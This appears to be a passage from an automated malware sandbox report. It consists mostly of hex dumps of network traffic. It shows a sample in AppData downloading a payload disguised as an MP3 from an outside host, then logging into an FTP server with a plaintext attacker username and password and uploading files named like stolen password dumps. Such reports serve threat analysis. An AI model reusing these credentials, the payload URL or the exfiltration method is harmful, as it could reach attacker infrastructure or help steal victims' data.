                                        Data Ascii: R&JE46m$|$J|d`A23~'&PIC01JDILNX= [Zt| ]SJEHNcwDBB%n^-Hf,9]W9tQXje5bf %F U!he,'7N'+6(~OS ?U%w''K
                                        2024-10-09 08:51:17 UTC8000INData Raw: d3 88 53 21 ff 80 59 06 0b 8e 4e e0 04 6d dd 9a a1 d5 1b 66 65 ad cb bf 4a b3 75 37 b6 5c 6e c8 bb 87 cc 83 69 cb 8e f9 63 f3 42 c4 94 9b 71 76 e2 40 e7 21 f8 6c 43 1d 57 e5 79 8e 7f 8c 8f e0 9e 95 41 82 93 f0 27 32 7f f2 ad ee e6 1b 23 d6 d7 5a 32 32 40 42 ea e0 f8 b2 d2 75 d3 15 5a 61 d8 3e 92 9c 60 d3 a5 62 94 b6 d9 f8 ac d3 65 3d cb af f1 a0 1b b0 40 7a d6 4a 34 83 c4 62 39 fb 11 9c ea 7d 26 d9 01 84 7c d5 62 cd 6d 6b be da a7 eb a9 00 1d 75 26 91 43 df 7a 38 21 8c 1a 19 57 f9 42 83 a6 13 9b e4 f3 f6 82 a9 27 51 fa c0 b4 d4 f3 ec b1 65 97 f6 1e 9f 85 35 49 f8 ad 28 73 6d 82 47 e9 31 2c bc e4 e9 82 c0 33 bb 0c 80 1e eb 40 ef 98 44 25 d2 69 21 77 0f 0f 23 09 89 ae 1d 7e 35 c9 63 7a fa 95 a4 f7 ea f8 69 73 27 1c 6d be b1 ed 57 08 4d db 7d a1 d4 9f 20 c4
                                        Data Ascii: S!YNmfeJu7\nicBqv@!lCWyA'2#Z22@BuZa>`be=@zJ4b9}&|bmku&Cz8!WB'Qe5I(smG1,3@D%i!w#~5czis'mWM}
                                        2024-10-09 08:51:17 UTC8000INData Raw: 3e 7d 0a e2 eb 1c 91 65 2e fb b7 02 aa cf ca 43 2c 4f 8f a0 35 ab e1 57 9e 88 8d e4 6f 61 db 43 90 15 89 ce 1e 91 1e 00 a2 02 92 95 96 b0 6f 95 a8 d4 ca fa e5 d3 54 60 1c 4c ec 49 1d 34 98 25 b9 50 21 ae 55 02 a5 1e f0 da 8e 0d f8 cd a2 69 1c 16 d7 15 ed 3f 1d 2c bd a8 95 ea af 47 a0 31 f6 e3 a6 da 94 bb 4c 5e fe 55 de 79 d3 c3 0f a9 76 d3 79 e3 5d 2d 8e 1c d0 82 93 fc d2 76 85 9e a3 ca 15 44 57 b1 d5 1a a7 99 d0 ef b5 65 77 ad dc 4f 56 31 06 4a b3 88 33 e8 56 3a 48 7c f9 13 ab 1e 6e 1e 29 f5 2b 4f 35 c5 0f 29 2a 6f 2c 98 7e 73 77 9b 9c 3f 2f 49 51 85 51 2d 1c 12 eb 39 93 0c 9f 41 71 e1 19 5f e1 f3 52 43 fd da 2d ef 2d c4 b7 a1 45 c7 c3 f3 19 58 7d c1 cc 3f e4 08 4c 71 d8 56 8b 6e 4a 14 e7 58 46 4c ea e2 50 73 b4 34 96 52 17 a8 50 4a 3f 61 43 7e a1 75 7e
                                        Data Ascii: >}e.C,O5WoaCoT`LI4%P!Ui?,G1L^Uyvy]-vDWewOV1J3V:H|n)+O5)*o,~sw?/IQQ-9Aq_RC--EX}?LqVnJXFLPs4RPJ?aC~u~
                                        2024-10-09 08:51:17 UTC8000INData Raw: 43 89 fc ce b6 1f 53 39 3d 1e dd 34 fb 1f ea f1 b6 83 38 aa 0b 08 30 a0 af b1 18 dd f0 41 03 b1 60 b8 14 9a f7 42 2a 39 07 9a c0 db 07 78 ec 3e da 46 b5 2d 04 ec e3 9f 16 4e 08 e0 70 37 6c 09 7a 04 05 5c 13 89 ed 13 69 ff 0b 7f 11 5e 8f df 74 37 17 ee b6 64 b5 50 f5 ca 6e e4 bc be 64 02 30 00 b9 df f4 b8 c9 f0 5b 12 e8 f1 4a cd 48 d1 d2 cd 08 a3 5f f6 ee 09 50 0c 2d a7 5d 8a cc 67 cc ef 1d 88 19 79 5b 2a 39 e4 79 51 b0 68 63 ee 6d b9 66 9a 0c 4c d9 c6 7d 28 5d e6 9d 07 81 3d 94 e1 f7 8b 2d ac 0b 7a a7 44 85 a0 ee f7 fe 45 b0 38 64 af 57 98 56 1b 12 aa a2 58 55 87 3b 9d 72 dd 9f da 4d ec 50 7d 31 3c 9c 3d 2a 76 22 50 bc ec b2 b3 4d a2 87 47 49 13 13 05 cc 5b cf 7d d9 b3 31 8e e7 62 4a 41 21 12 87 e3 9d ca e2 8b bf 58 ab 2f c1 42 7c a5 0c 0f 90 6f 93 ad 64
                                        Data Ascii: CS9=480A`B*9x>F-Np7lz\i^t7dPnd0[JH_P-]gy[*9yQhcmfL}(]=-zDE8dWVXU;rMP}1<=*v"PMGI[}1bJA!X/B|od
                                        2024-10-09 08:51:17 UTC8000INData Raw: bb ca 76 1d f5 7c 55 6b 58 74 c6 32 63 37 fb 1d f2 d1 a7 e8 a0 9c f2 bb f8 ec 5e f4 86 38 44 4e c6 04 93 be cb 87 9f 96 1e 8e a0 bf 1a 1c 3c fb 6e ad f8 68 02 04 d3 53 5f b9 bf f0 ab 24 8b 01 98 fa 30 fc 97 78 3d 76 6f e6 6f b0 8f 25 6d b4 3a e1 16 71 3e b5 17 b6 41 98 31 78 36 40 1c a6 19 20 55 89 99 e9 da 4d 84 72 cf 4e 98 9c b8 c2 8a 2b d1 12 98 ba 13 db 4f 33 ac c2 9f 2c b6 ef 3f f4 54 ed 4a d4 7a 05 41 c3 e6 b4 1b db 02 03 19 e0 ff 79 1b 86 ed 4f d7 b7 29 3d c0 d0 82 76 f4 37 5d 0c e6 73 4c be c6 7d ed de f8 d6 a7 ff 28 72 96 36 64 84 d3 4b 1e 78 44 f1 bc 62 64 58 16 90 6e 57 63 1d 4e 19 10 ba 63 84 32 42 7d e6 c0 2b 41 8a 3e eb bf 4c 84 ad aa 6c a1 a2 3e 56 23 71 4a 14 1d b0 b9 3f fa da 5b fd 99 f6 4b b2 0c 0d e4 88 1d ca 5b 75 68 dc 94 98 5f 59 0f
                                        Data Ascii: v|UkXt2c7^8DN<nhS_$0x=voo%m:q>A1x6@ UMrN+O3,?TJzAyO)=v7]sL}(r6dKxDbdXnWcNc2B}+A>Ll>V#qJ?[K[uh_Y
                                        2024-10-09 08:51:17 UTC8000INData Raw: 8a 0b 21 00 87 bc 1a 06 7f 57 bd 89 8c 18 4d b5 17 4c b6 e6 f7 ac e1 71 09 a5 e1 7f 86 4a d5 1b 4f 02 2d 8f c9 c4 5a e5 79 5c b4 22 4e 81 62 84 aa 93 87 4b a6 b7 ec ea 16 4c a3 81 df f6 b1 9e c8 32 b2 b0 4f 60 e5 cd e2 47 09 ea fb ff cb 64 b9 05 15 93 11 12 72 c7 28 43 21 fb a2 2e f0 99 ed 75 af 32 fd 17 53 85 eb b4 b5 09 f5 da 52 9c cc 9e 35 10 f2 4c 6a d7 33 32 01 c7 15 c7 9c 29 0a 6e 60 f2 40 a8 75 d4 5e 69 97 4c 67 54 5b ae bd 56 ee af b3 95 e1 fd a3 ad 73 ba 98 b6 15 05 fb b5 2c 53 2f d5 76 d4 0a af 14 43 4d c3 06 5c 12 2d 10 15 5d c9 a8 92 b4 7b 12 fb 29 fa 9d b1 bf 43 5a 7e ed 57 cf 7e ef 29 d4 5c ea 37 f4 cd 7f 7e 5b e4 92 02 a1 0e b0 5c 8c 95 f5 27 57 49 02 9c d4 f4 c9 f1 4d 46 e1 d5 6e c6 d1 8d ea 8e 3f 96 09 1a dd 1a 83 a5 e6 12 b5 0d 86 34 3c
                                        Data Ascii: !WMLqJO-Zy\"NbKL2O`Gdr(C!.u2SR5Lj32)n`@u^iLgT[Vs,S/vCM\-]{)CZ~W~)\7~[\'WIMFn?4<


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.449742103.191.208.1224438052C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-09 08:51:24 UTC94OUTGET /omani/Mrlres.mp3 HTTP/1.1
                                        Host: rubberpartsmanufacturers.com
                                        Connection: Keep-Alive
                                        2024-10-09 08:51:25 UTC235INHTTP/1.1 200 OK
                                        Date: Wed, 09 Oct 2024 08:51:24 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Wed, 09 Oct 2024 07:54:24 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 958480
                                        Content-Type: audio/mpeg
                                        2024-10-09 08:51:25 UTC7957INData Raw: 88 14 a7 17 bd e8 67 29 50 62 e3 5e 42 a4 4a 34 19 52 a8 2c c3 23 95 4e 6a 7a 5e d8 17 90 c0 74 6f 69 9f d7 1d c0 6e 61 68 4a b7 48 b5 82 74 65 07 04 da ca 2b 86 46 d2 82 dc 75 03 96 e3 fa ee bc ef 53 e7 e5 b7 66 bb f0 92 b6 10 7d 8b 6f 52 55 38 be b9 ff d8 3f 84 1e c3 f5 84 44 f2 03 86 7e f4 7e 36 74 95 f7 73 de 1a 4a 72 4c d2 4d 6c bf 8a 46 c0 b4 0f a0 9e 64 01 60 e6 e6 5e 2f 3a e2 4e 31 25 6a 78 91 cb e5 6d c6 c0 3b ef fe 00 67 12 ce ff 25 4f d1 d1 7f e5 9f 7e 56 4a 71 40 91 13 1a 1e 94 dd 1a eb b0 72 cf d8 f9 3f bf b8 64 e4 c8 ea ea 58 18 cd 1f 3d 6b 6e 4a ff 5c 6e e0 9a dc d1 3d 1b 49 f3 b7 e5 38 9e de d6 81 d5 02 6b e3 2d f2 66 dc 94 b9 10 8a b0 eb 88 28 c5 c0 aa c1 85 9e 4b 90 27 ee 2d e6 b8 85 0d eb b5 49 fa a9 33 90 79 74 f0 2d 43 cd 2f 68 e5 bc
                                        Data Ascii: g)Pb^BJ4R,#Njz^toinahJHte+FuSf}oRU8?D~~6tsJrLMlFd`^/:N1%jxm;g%O~VJq@r?dX=knJ\n=I8k-f(K'-I3yt-C/h
                                        2024-10-09 08:51:25 UTC8000INData Raw: c8 90 a7 89 1d e7 6d cd 21 aa 28 46 f1 f2 c5 a2 13 0b 1d 81 19 60 4f 58 2f 8c b2 29 1b 98 b0 4b 7f dd 7b 81 f1 d9 d3 a5 e7 8d 26 88 4a 28 6b f1 05 8f b8 0b 26 de 17 21 90 ea 1c 8e ef fb f0 2f 7f 09 ad 64 78 0d ae 33 a6 38 12 c4 a8 84 dc 0f 11 28 62 1d 06 10 29 66 cf c5 28 bf 0d df cc 91 3d 0b 02 b7 5f 16 f9 16 e4 5d fb ee 39 d1 8c e4 4a a0 99 e6 b2 d5 d6 d2 41 8c 75 f2 fc e4 fc c4 1b 5d a7 0f 23 8f 71 bf 4a 1d 9b 90 4a ce ca fc a4 7c 34 57 0d 7a cd 08 92 de 00 c1 38 f2 93 a8 9e ba dd 6e 66 32 8f c0 74 73 84 7f bd c9 29 dc 31 7b f8 8f 1f 2f df fd 70 bc 5c 32 de b3 52 f7 3c ed 50 d5 3c 4e 97 30 25 42 ae 1a 9a d3 cf 28 c8 09 15 04 d6 13 bd db 13 b3 15 93 ae 09 57 1b 0d 4e ee 82 37 8b 59 bf 8d 02 f5 4e a1 fe b3 3c 79 c1 79 9e a7 1e 92 7e 82 07 49 3d a3 e2 5f
                                        Data Ascii: m!(F`OX/)K{&J(k&!/dx38(b)f(=_]9JAu]#qJJ|4Wz8nf2ts)1{/p\2R<P<N0%B(WN7YN<yy~I=_
                                        2024-10-09 08:51:25 UTC8000INData Raw: ae 68 01 cb 0b d0 d6 62 67 49 43 55 da 28 9f cd 0b 86 80 d0 68 3b 19 55 7b 77 1f a0 8f 87 12 fe c5 e1 64 0c e7 a5 cd f5 9f b2 30 f4 89 5a 86 f7 37 6e 8e 77 ed f3 28 c4 8d e4 83 50 46 c6 83 ae 87 ae 51 e6 96 b9 85 f1 77 c8 e8 c6 ba 3b 1a 9b 06 57 a7 a2 23 8c da 85 c7 f2 5a 05 7e d7 04 59 25 df e1 03 87 64 3f 47 3e a7 7b 9e 2b 75 f5 99 41 b9 7e dc de 5a b3 d6 42 82 1c 83 2e cc a8 65 9c 2e 63 0b a7 3c 2e b4 c0 b8 a0 61 f4 80 44 15 65 d7 7d 96 53 58 48 8c 40 1f 08 12 76 b1 c2 48 b3 06 06 fe e2 25 65 ed 39 60 19 40 ae e7 b1 29 14 c3 f3 dc 1b 07 d5 33 66 2b 9a 83 af bb 43 90 3f 92 9a 28 b0 c2 2e 63 95 ad 37 f2 70 69 fa 9e 78 23 b1 c7 e6 33 7b db de fa a9 23 44 22 44 ec 3a d7 fa 74 81 24 02 3a 2b 9b bb 7f 4f 82 49 ce 2d 9f 44 38 bb 3d c7 cb b6 e2 9e 3f 3e ff da
                                        Data Ascii: hbgICU(h;U{wd0Z7nw(PFQw;W#Z~Y%d?G>{+uA~ZB.e.c<.aDe}SXH@vH%e9`@)3f+C?(.c7pix#3{#D"D:t$:+OI-D8=?>
                                        2024-10-09 08:51:25 UTC8000INData Raw: 7f 14 8f 52 2b da 02 c9 83 ce 12 07 6f c7 86 ef 36 e4 a9 2f 40 b8 28 a6 a0 b1 41 f3 6c 76 fc 63 31 13 72 c8 9e 1a eb f5 d8 0e a0 c9 82 e8 ba 28 83 61 10 d7 32 9a 28 16 ea 70 2e 8e c1 35 28 cd 9d 8d cb d0 4c a9 0d 55 8c 39 b6 a2 ce 0c af f2 dd d7 8f c2 85 f9 a6 4a 7a 0b d6 5a 2b 35 f2 32 d1 13 ca 2a a6 92 f2 46 6e 3f ef af c7 a1 12 f7 7e 75 db 23 b8 fa 86 dc fb ed c0 8a 05 5d 18 bc cf ac 3c 77 1d 15 99 0b e1 3f 50 3c b6 1c 64 bf ed 0b f7 99 59 48 b8 e6 fc 5d 09 c8 7e dc e0 55 83 3b 94 53 75 aa 40 24 60 c4 4b 8f 40 e8 26 16 76 0f e5 9b 84 82 15 2f bb 72 ac e8 be df 81 00 9c db 6d c3 b9 9c 2a 5f f8 f2 d4 e8 0b fc b7 ec 00 b8 3b b9 e2 b5 c8 ee 7b 45 94 f9 d7 b7 59 45 be d4 a8 31 60 a4 50 e7 b7 38 84 5c cd 11 dd d3 6f 38 d3 5e 91 45 3f dc c8 77 73 6c 11 58 49
                                        Data Ascii: R+o6/@(Alvc1r(a2(p.5(LU9JzZ+52*Fn?~u#]<w?P<dYH]~U;Su@$`K@&v/rm*_;{EYE1`P8\o8^E?wslXI
                                        2024-10-09 08:51:25 UTC8000INData Raw: 52 cd 26 4a 45 b4 aa a5 f5 fe c1 d9 18 98 34 36 d1 6d 24 f5 07 7c 95 de 24 4a e8 cd e0 7c 64 cc 60 8a 41 32 33 7e 27 b1 26 50 fa 49 a5 0d 07 f0 df 0e 43 30 31 c9 4a e9 8e 44 49 a9 b9 c7 15 4c a2 4e da 91 0e 0e bb 13 58 3d 12 20 5b 5a a7 05 17 74 bb 05 7c 20 5d d9 b8 53 f7 af 4a c1 83 cc be dd a0 45 89 48 97 0a 83 84 8c fc 19 4e 63 77 01 44 86 9b d9 e7 42 42 eb 25 c0 a0 ae 6e fc 86 5e 2d 81 48 66 a7 a5 2c 9b b1 f2 39 0f e8 b6 5d a8 b3 00 57 39 74 51 9f 58 a0 6a c0 ca 9a 86 65 35 62 83 09 66 b9 20 a9 cf 0a c8 cc b6 25 0f 1a 46 20 55 f2 c5 a7 bd f7 0d 1e 21 68 d3 d0 65 93 fb e5 ae 02 2c 89 03 e5 bf 27 de e6 37 14 16 b5 4e 27 18 86 8a 2b 1a ee 8f c0 b9 cf c6 12 7f 1e c4 bd a1 36 99 b3 28 7e 4f c2 93 8c 94 53 ce 20 17 3f 55 96 c4 12 ca 25 77 1f 27 27 a7 4b c5
                                        Data Ascii: R&JE46m$|$J|d`A23~'&PIC01JDILNX= [Zt| ]SJEHNcwDBB%n^-Hf,9]W9tQXje5bf %F U!he,'7N'+6(~OS ?U%w''K
                                        2024-10-09 08:51:25 UTC8000INData Raw: d3 88 53 21 ff 80 59 06 0b 8e 4e e0 04 6d dd 9a a1 d5 1b 66 65 ad cb bf 4a b3 75 37 b6 5c 6e c8 bb 87 cc 83 69 cb 8e f9 63 f3 42 c4 94 9b 71 76 e2 40 e7 21 f8 6c 43 1d 57 e5 79 8e 7f 8c 8f e0 9e 95 41 82 93 f0 27 32 7f f2 ad ee e6 1b 23 d6 d7 5a 32 32 40 42 ea e0 f8 b2 d2 75 d3 15 5a 61 d8 3e 92 9c 60 d3 a5 62 94 b6 d9 f8 ac d3 65 3d cb af f1 a0 1b b0 40 7a d6 4a 34 83 c4 62 39 fb 11 9c ea 7d 26 d9 01 84 7c d5 62 cd 6d 6b be da a7 eb a9 00 1d 75 26 91 43 df 7a 38 21 8c 1a 19 57 f9 42 83 a6 13 9b e4 f3 f6 82 a9 27 51 fa c0 b4 d4 f3 ec b1 65 97 f6 1e 9f 85 35 49 f8 ad 28 73 6d 82 47 e9 31 2c bc e4 e9 82 c0 33 bb 0c 80 1e eb 40 ef 98 44 25 d2 69 21 77 0f 0f 23 09 89 ae 1d 7e 35 c9 63 7a fa 95 a4 f7 ea f8 69 73 27 1c 6d be b1 ed 57 08 4d db 7d a1 d4 9f 20 c4
                                        Data Ascii: S!YNmfeJu7\nicBqv@!lCWyA'2#Z22@BuZa>`be=@zJ4b9}&|bmku&Cz8!WB'Qe5I(smG1,3@D%i!w#~5czis'mWM}
                                        2024-10-09 08:51:25 UTC8000INData Raw: 3e 7d 0a e2 eb 1c 91 65 2e fb b7 02 aa cf ca 43 2c 4f 8f a0 35 ab e1 57 9e 88 8d e4 6f 61 db 43 90 15 89 ce 1e 91 1e 00 a2 02 92 95 96 b0 6f 95 a8 d4 ca fa e5 d3 54 60 1c 4c ec 49 1d 34 98 25 b9 50 21 ae 55 02 a5 1e f0 da 8e 0d f8 cd a2 69 1c 16 d7 15 ed 3f 1d 2c bd a8 95 ea af 47 a0 31 f6 e3 a6 da 94 bb 4c 5e fe 55 de 79 d3 c3 0f a9 76 d3 79 e3 5d 2d 8e 1c d0 82 93 fc d2 76 85 9e a3 ca 15 44 57 b1 d5 1a a7 99 d0 ef b5 65 77 ad dc 4f 56 31 06 4a b3 88 33 e8 56 3a 48 7c f9 13 ab 1e 6e 1e 29 f5 2b 4f 35 c5 0f 29 2a 6f 2c 98 7e 73 77 9b 9c 3f 2f 49 51 85 51 2d 1c 12 eb 39 93 0c 9f 41 71 e1 19 5f e1 f3 52 43 fd da 2d ef 2d c4 b7 a1 45 c7 c3 f3 19 58 7d c1 cc 3f e4 08 4c 71 d8 56 8b 6e 4a 14 e7 58 46 4c ea e2 50 73 b4 34 96 52 17 a8 50 4a 3f 61 43 7e a1 75 7e
                                        Data Ascii: >}e.C,O5WoaCoT`LI4%P!Ui?,G1L^Uyvy]-vDWewOV1J3V:H|n)+O5)*o,~sw?/IQQ-9Aq_RC--EX}?LqVnJXFLPs4RPJ?aC~u~
                                        2024-10-09 08:51:25 UTC8000INData Raw: 43 89 fc ce b6 1f 53 39 3d 1e dd 34 fb 1f ea f1 b6 83 38 aa 0b 08 30 a0 af b1 18 dd f0 41 03 b1 60 b8 14 9a f7 42 2a 39 07 9a c0 db 07 78 ec 3e da 46 b5 2d 04 ec e3 9f 16 4e 08 e0 70 37 6c 09 7a 04 05 5c 13 89 ed 13 69 ff 0b 7f 11 5e 8f df 74 37 17 ee b6 64 b5 50 f5 ca 6e e4 bc be 64 02 30 00 b9 df f4 b8 c9 f0 5b 12 e8 f1 4a cd 48 d1 d2 cd 08 a3 5f f6 ee 09 50 0c 2d a7 5d 8a cc 67 cc ef 1d 88 19 79 5b 2a 39 e4 79 51 b0 68 63 ee 6d b9 66 9a 0c 4c d9 c6 7d 28 5d e6 9d 07 81 3d 94 e1 f7 8b 2d ac 0b 7a a7 44 85 a0 ee f7 fe 45 b0 38 64 af 57 98 56 1b 12 aa a2 58 55 87 3b 9d 72 dd 9f da 4d ec 50 7d 31 3c 9c 3d 2a 76 22 50 bc ec b2 b3 4d a2 87 47 49 13 13 05 cc 5b cf 7d d9 b3 31 8e e7 62 4a 41 21 12 87 e3 9d ca e2 8b bf 58 ab 2f c1 42 7c a5 0c 0f 90 6f 93 ad 64
                                        Data Ascii: CS9=480A`B*9x>F-Np7lz\i^t7dPnd0[JH_P-]gy[*9yQhcmfL}(]=-zDE8dWVXU;rMP}1<=*v"PMGI[}1bJA!X/B|od
                                        2024-10-09 08:51:25 UTC8000INData Raw: bb ca 76 1d f5 7c 55 6b 58 74 c6 32 63 37 fb 1d f2 d1 a7 e8 a0 9c f2 bb f8 ec 5e f4 86 38 44 4e c6 04 93 be cb 87 9f 96 1e 8e a0 bf 1a 1c 3c fb 6e ad f8 68 02 04 d3 53 5f b9 bf f0 ab 24 8b 01 98 fa 30 fc 97 78 3d 76 6f e6 6f b0 8f 25 6d b4 3a e1 16 71 3e b5 17 b6 41 98 31 78 36 40 1c a6 19 20 55 89 99 e9 da 4d 84 72 cf 4e 98 9c b8 c2 8a 2b d1 12 98 ba 13 db 4f 33 ac c2 9f 2c b6 ef 3f f4 54 ed 4a d4 7a 05 41 c3 e6 b4 1b db 02 03 19 e0 ff 79 1b 86 ed 4f d7 b7 29 3d c0 d0 82 76 f4 37 5d 0c e6 73 4c be c6 7d ed de f8 d6 a7 ff 28 72 96 36 64 84 d3 4b 1e 78 44 f1 bc 62 64 58 16 90 6e 57 63 1d 4e 19 10 ba 63 84 32 42 7d e6 c0 2b 41 8a 3e eb bf 4c 84 ad aa 6c a1 a2 3e 56 23 71 4a 14 1d b0 b9 3f fa da 5b fd 99 f6 4b b2 0c 0d e4 88 1d ca 5b 75 68 dc 94 98 5f 59 0f
                                        Data Ascii: v|UkXt2c7^8DN<nhS_$0x=voo%m:q>A1x6@ UMrN+O3,?TJzAyO)=v7]sL}(r6dKxDbdXnWcNc2B}+A>Ll>V#qJ?[K[uh_Y
                                        2024-10-09 08:51:25 UTC8000INData Raw: 8a 0b 21 00 87 bc 1a 06 7f 57 bd 89 8c 18 4d b5 17 4c b6 e6 f7 ac e1 71 09 a5 e1 7f 86 4a d5 1b 4f 02 2d 8f c9 c4 5a e5 79 5c b4 22 4e 81 62 84 aa 93 87 4b a6 b7 ec ea 16 4c a3 81 df f6 b1 9e c8 32 b2 b0 4f 60 e5 cd e2 47 09 ea fb ff cb 64 b9 05 15 93 11 12 72 c7 28 43 21 fb a2 2e f0 99 ed 75 af 32 fd 17 53 85 eb b4 b5 09 f5 da 52 9c cc 9e 35 10 f2 4c 6a d7 33 32 01 c7 15 c7 9c 29 0a 6e 60 f2 40 a8 75 d4 5e 69 97 4c 67 54 5b ae bd 56 ee af b3 95 e1 fd a3 ad 73 ba 98 b6 15 05 fb b5 2c 53 2f d5 76 d4 0a af 14 43 4d c3 06 5c 12 2d 10 15 5d c9 a8 92 b4 7b 12 fb 29 fa 9d b1 bf 43 5a 7e ed 57 cf 7e ef 29 d4 5c ea 37 f4 cd 7f 7e 5b e4 92 02 a1 0e b0 5c 8c 95 f5 27 57 49 02 9c d4 f4 c9 f1 4d 46 e1 d5 6e c6 d1 8d ea 8e 3f 96 09 1a dd 1a 83 a5 e6 12 b5 0d 86 34 3c
                                        Data Ascii: !WMLqJO-Zy\"NbKL2O`Gdr(C!.u2SR5Lj32)n`@u^iLgT[Vs,S/vCM\-]{)CZ~W~)\7~[\'WIMFn?4<


                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Oct 9, 2024 10:51:05.319823027 CEST21497315.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 9, 2024 10:51:05.324054003 CEST4973121192.168.2.45.2.84.236USER fgghv@alternatifplastik.com
                                        Oct 9, 2024 10:51:05.549638033 CEST21497315.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 9, 2024 10:51:05.556726933 CEST4973121192.168.2.45.2.84.236PASS Fineboy777@
                                        Oct 9, 2024 10:51:05.856355906 CEST21497315.2.84.236192.168.2.4230 OK. Current restricted directory is /
                                        Oct 9, 2024 10:51:06.081975937 CEST21497315.2.84.236192.168.2.4504 Unknown command
                                        Oct 9, 2024 10:51:06.082195997 CEST4973121192.168.2.45.2.84.236PWD
                                        Oct 9, 2024 10:51:06.307672024 CEST21497315.2.84.236192.168.2.4257 "/" is your current location
                                        Oct 9, 2024 10:51:06.307852030 CEST4973121192.168.2.45.2.84.236TYPE I
                                        Oct 9, 2024 10:51:06.533163071 CEST21497315.2.84.236192.168.2.4200 TYPE is now 8-bit binary
                                        Oct 9, 2024 10:51:06.533437967 CEST4973121192.168.2.45.2.84.236PASV
                                        Oct 9, 2024 10:51:06.758912086 CEST21497315.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,211,156)
                                        Oct 9, 2024 10:51:06.765173912 CEST4973121192.168.2.45.2.84.236STOR PW_user-618321_2024_10_09_04_51_03.html
                                        Oct 9, 2024 10:51:07.397644043 CEST21497315.2.84.236192.168.2.4150 Accepted data connection
                                        Oct 9, 2024 10:51:07.624701977 CEST21497315.2.84.236192.168.2.4226-File successfully transferred
                                        226-File successfully transferred226 0.227 seconds (measured here), 1.37 Kbytes per second
                                        Oct 9, 2024 10:51:21.326148033 CEST21497405.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 9, 2024 10:51:21.326410055 CEST4974021192.168.2.45.2.84.236USER fgghv@alternatifplastik.com
                                        Oct 9, 2024 10:51:21.545527935 CEST21497405.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 9, 2024 10:51:21.546813965 CEST4974021192.168.2.45.2.84.236PASS Fineboy777@
                                        Oct 9, 2024 10:51:21.791490078 CEST21497405.2.84.236192.168.2.4230 OK. Current restricted directory is /
                                        Oct 9, 2024 10:51:22.010991096 CEST21497405.2.84.236192.168.2.4504 Unknown command
                                        Oct 9, 2024 10:51:22.011218071 CEST4974021192.168.2.45.2.84.236PWD
                                        Oct 9, 2024 10:51:22.230489016 CEST21497405.2.84.236192.168.2.4257 "/" is your current location
                                        Oct 9, 2024 10:51:22.230655909 CEST4974021192.168.2.45.2.84.236TYPE I
                                        Oct 9, 2024 10:51:22.452299118 CEST21497405.2.84.236192.168.2.4200 TYPE is now 8-bit binary
                                        Oct 9, 2024 10:51:22.453718901 CEST4974021192.168.2.45.2.84.236PASV
                                        Oct 9, 2024 10:51:22.673631907 CEST21497405.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,233,230)
                                        Oct 9, 2024 10:51:22.680289984 CEST4974021192.168.2.45.2.84.236STOR PW_user-618321_2024_10_09_04_51_19.html
                                        Oct 9, 2024 10:51:23.289320946 CEST21497405.2.84.236192.168.2.4150 Accepted data connection
                                        Oct 9, 2024 10:51:23.509576082 CEST21497405.2.84.236192.168.2.4226-File successfully transferred
                                        226-File successfully transferred226 0.221 seconds (measured here), 1.41 Kbytes per second
                                        Oct 9, 2024 10:51:29.896641016 CEST21497435.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 9, 2024 10:51:29.923542023 CEST4974321192.168.2.45.2.84.236USER fgghv@alternatifplastik.com
